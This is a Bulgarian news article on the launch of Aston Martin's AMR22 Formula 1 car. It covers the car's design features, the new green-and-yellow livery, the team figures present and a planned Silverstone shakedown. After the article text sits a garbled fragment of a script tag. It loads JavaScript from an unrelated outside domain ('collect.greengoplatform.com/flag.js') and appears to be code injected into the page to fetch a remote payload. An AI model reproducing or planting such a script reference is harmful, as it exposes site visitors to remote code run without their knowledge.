Новини

Aston Martin показа какво да очакваме през 2022

Британците представиха истинския AMR22, а не само демо автомобил

 

Aston Martin стана третият отбор с официална премиера този сезон след Haas F1 и Red Bull. Британците обаче показаха в базата си в Гейдън истинския AMR22, а не демо автомобил с цветовата схема за новия сезон.

 

Основните отличителни белези на AMR22 са цялостния канал, който минава под радиаторните кутии, четирикомпонентното предно крило, пушрод окачването и максимално изтънения капак на двигателя. Върху радиаторните кутии се открояват и множеството прорези за оптимизиране на охлаждането, което вероятно използва хоризонално разположени радиатори. За първи път виждаме и DRS система, базирана на правилата за 2022 година.

 

Цветовата схема на AMR22 се отличава от миналогодишната, въпреки че основният цвят все още е британско състезателно зелено. То е комбинирано с лимонено жълти акценти, а не с розови, след като BWT и Aston Martin сложиха точка на сътрудничеството си.

 

На официалната презентация в Гейдън присъстваха двамата титулярни пилоти Себастиан Фетел и Ланс Строл, техническият ръководител Андрю Грийн, пърформънс директорът Том МакКълa и босът на компанията Лорънс Строл. В началото на годината Ason Martin обяви, че дългогодишният тим шеф Отмар Сафнауер напуска отбора. Очакванията са, че той ще се присъедини към екипа на Alpine заедно с BWT.

 

AMR22 ще се появи за първи път на писта още в края на тази седмица. Шейкдаунът на новия автомобил е планиран за петък на „Силвърстоун“.

 

 


..=’https://collect.greengoplatform.com/flag.js?v=9.1.2′ type=’text/javascript’>

Виж още

Back to top button